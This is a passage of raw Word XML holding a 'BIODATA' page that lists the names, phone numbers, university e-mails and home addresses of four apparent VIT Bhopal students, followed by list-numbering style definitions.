AD//wMAUEsBAi0AFAAGAAgA&#10;AAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwEC&#10;LQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwEC&#10;LQAUAAYACAAAACEAg3oNLq8BAABHAwAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQ&#10;SwECLQAUAAYACAAAACEAscO//t0AAAALAQAADwAAAAAAAAAAAAAAAAAJBAAAZHJzL2Rvd25yZXYu&#10;eG1sUEsFBgAAAAAEAAQA8wAAABMFAAAAAA==&#10;" strokecolor="#fdfdfd" strokeweight="1pt">
                <w10:wrap anchorx="page" anchory="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00336E0D">
        <w:t xml:space="preserve">                                                             B</w:t>
      </w:r>
      <w:r>
        <w:t>IODATA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EEEE90" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="35"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CCA17BF" w14:textId="6AF74289" w:rsidR="00736C51" w:rsidRDefault="00445FE1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4972"/>
          <w:tab w:val="left" w:pos="5013"/>
        </w:tabs>
        <w:spacing w:line="379" w:lineRule="auto"/>
        <w:ind w:left="2820" w:right="3165"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Name:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C6408B">
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Veeraboina Gnaneswar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6442CEDF" w14:textId="6B98882C" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4972"/>
          <w:tab w:val="left" w:pos="5013"/>
        </w:tabs>
        <w:spacing w:line="379" w:lineRule="auto"/>
        <w:ind w:left="2820" w:right="3165"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mobile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Number:</w:t>
      </w:r>
      <w:r w:rsidR="00C6408B">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>8309070103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2769CCDC" w14:textId="1B98AA74" w:rsidR="00A778D5" w:rsidRDefault="00445FE1" w:rsidP="00C6408B">
      <w:pPr>
        <w:ind w:left="2078" w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00C6408B">
        <w:t xml:space="preserve">E-mail: </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidR="00C6408B" w:rsidRPr="00EE1C11">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>veeraboina.gnaneswar2020@vitbhopal.ac.in</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2DB56BA1" w14:textId="3069AF90" w:rsidR="00C6408B" w:rsidRDefault="00C6408B" w:rsidP="00C6408B">
      <w:pPr>
        <w:ind w:left="2078" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Address: Kadapa, Andhara Pradesh ,516434</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E4D304" w14:textId="77777777" w:rsidR="00A778D5" w:rsidRDefault="00A778D5">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AF84FE6" w14:textId="77777777" w:rsidR="00AC7243" w:rsidRDefault="00AC7243">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="057FF1AF" w14:textId="1EB4F5CA" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4972"/>
        </w:tabs>
        <w:ind w:left="2918"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Name: </w:t>
      </w:r>
      <w:r w:rsidR="00C6408B">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>V.Venu Madhav Reddy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18678704" w14:textId="0B1FA6CC" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="6324"/>
        </w:tabs>
        <w:spacing w:before="161"/>
        <w:ind w:left="2918"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mobile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Number</w:t>
      </w:r>
      <w:r w:rsidR="00C6408B">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:9347336114</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B36005" w14:textId="3534C4BC" w:rsidR="00A778D5" w:rsidRDefault="00445FE1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4972"/>
        </w:tabs>
        <w:spacing w:before="159"/>
        <w:ind w:left="2858"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>E-mail:</w:t>
      </w:r>
      <w:r w:rsidR="00AC7243">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C6408B">
        <w:t xml:space="preserve">v.venumadhavreddy2020@vitbhopal.ac.in </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BBB926" w14:textId="17564981" w:rsidR="00A778D5" w:rsidRDefault="00445FE1" w:rsidP="00AC7243">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4970"/>
        </w:tabs>
        <w:spacing w:before="199"/>
        <w:ind w:left="2858"/>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Permanent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Address:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC7243">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Kurnool ,Andhara Pradesh, 518553</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290CB4E0" w14:textId="77777777" w:rsidR="00AC7243" w:rsidRDefault="00AC7243" w:rsidP="00AC7243">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4970"/>
        </w:tabs>
        <w:spacing w:before="199"/>
        <w:ind w:left="2858"/>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B407989" w14:textId="5E100E72" w:rsidR="00AC7243" w:rsidRDefault="00AC7243" w:rsidP="00AC7243">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4972"/>
        </w:tabs>
        <w:ind w:left="2918"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Name: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Satrassala Nikhil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3383406E" w14:textId="7D966189" w:rsidR="00AC7243" w:rsidRDefault="00AC7243" w:rsidP="00AC7243">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="6324"/>
        </w:tabs>
        <w:spacing w:before="161"/>
        <w:ind w:left="2918"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mobile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Number:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>7095474029</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4B96A0" w14:textId="21B75765" w:rsidR="00AC7243" w:rsidRDefault="00AC7243" w:rsidP="00AC7243">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4972"/>
        </w:tabs>
        <w:spacing w:before="159"/>
        <w:ind w:left="2858"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">E-mail: </w:t>
      </w:r>
      <w:r>
        <w:t>Satrasala.nikhil2020@vitbhopal.ac.in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33283953" w14:textId="7767507F" w:rsidR="00AC7243" w:rsidRDefault="00AC7243" w:rsidP="00AC7243">
      <w:pPr>
        <w:ind w:left="2078" w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC7243">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
        <w:t>Permanent</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7243">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7243">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
        <w:t>Address:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7243">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7243">
        <w:rPr>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
        <w:t>Kadapa, Andhara Pradesh ,51</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
        <w:t>6444.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138C99DE" w14:textId="584BC89F" w:rsidR="00AC7243" w:rsidRPr="00AC7243" w:rsidRDefault="00AC7243" w:rsidP="00AC7243">
      <w:pPr>
        <w:ind w:left="2078" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3386EF94" w14:textId="7606BD5E" w:rsidR="00AC7243" w:rsidRDefault="00AC7243" w:rsidP="00AC7243">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4972"/>
        </w:tabs>
        <w:ind w:left="2918"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Name: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6408B">
        <w:t>Pativada</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> L</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6408B">
        <w:t>okavardha</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA1D1B0" w14:textId="71E571F3" w:rsidR="00AC7243" w:rsidRDefault="00AC7243" w:rsidP="00AC7243">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="6324"/>
        </w:tabs>
        <w:spacing w:before="161"/>
        <w:ind w:left="2918"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mobile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Number:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF62D60" w14:textId="11C985F5" w:rsidR="00AC7243" w:rsidRDefault="00AC7243" w:rsidP="00AC7243">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4972"/>
        </w:tabs>
        <w:spacing w:before="159"/>
        <w:ind w:left="2858"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>E-mail:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7243">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7243">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>pativada.lokavardhan2020@vitbhopal.ac.in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B376695" w14:textId="2D363D76" w:rsidR="00AC7243" w:rsidRDefault="00AC7243" w:rsidP="00AC7243">
      <w:pPr>
        <w:ind w:left="2078" w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC7243">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
        <w:t>Permanent</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7243">
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7243">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
        <w:t>Address:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
        <w:t xml:space="preserve">Vijayanagaram </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7243">
        <w:rPr>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
        <w:t>, Andhara Pradesh ,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
        <w:t>535001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DE49B8" w14:textId="74D143C2" w:rsidR="00AC7243" w:rsidRPr="00AC7243" w:rsidRDefault="00AC7243" w:rsidP="00AC7243">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4970"/>
        </w:tabs>
        <w:spacing w:before="199"/>
        <w:ind w:left="2858"/>
        <w:rPr>
          <w:sz w:val="17"/>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="441380C9" w14:textId="77777777" w:rsidR="00AC7243" w:rsidRPr="00AC7243" w:rsidRDefault="00AC7243" w:rsidP="00AC7243">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4970"/>
        </w:tabs>
        <w:spacing w:before="199"/>
        <w:ind w:left="2858"/>
        <w:rPr>
          <w:sz w:val="17"/>
          <w:lang w:val="sv-SE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00AC7243" w:rsidRPr="00AC7243" w:rsidSect="00336E0D">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1500" w:right="760" w:bottom="280" w:left="134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A2B43"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A6DE3E1A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="933" w:hanging="454"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="933" w:hanging="454"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:w w:val="99"/>
        <w:sz w:val="26"/>
        <w:szCs w:val="26"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="155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66" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4420" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5373" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6326" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7280" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8233" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1B180FA8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C784C3BC"/>
    <w:lvl w:ilvl="0" w:tplc="8B025606">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="[%1]"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1192" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:w w:val="99"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="91A6F864">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2094" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D3E8E9DE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2988" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="B0F66818">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3882" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="C8A03232">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4776" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="04267E50">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5670" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="61B01E14">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6564" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="456E04C6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7458" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="993872F0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8352" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3208080C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AB962222"/>
    <w:lvl w:ilvl="0" w:tplc="E06E6588">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="839" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial MT" w:eastAsia="Arial MT" w:hAnsi="Arial MT" w:cs="Arial MT" w:hint="default"/>
        <w:color w:val="34444B"/>
        <w:w w:val="60"/>
        <w:sz w:val="26"/>
        <w:szCs w:val="26"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="93966580">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1120" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:color w:val="2F2F2F"/>
        <w:w w:val="100"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3F6EEEEE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2122" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="E56CEE8E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3124" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="466851E8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4126" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C610009E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5128" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="1B86596E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6131" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="4F74669A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
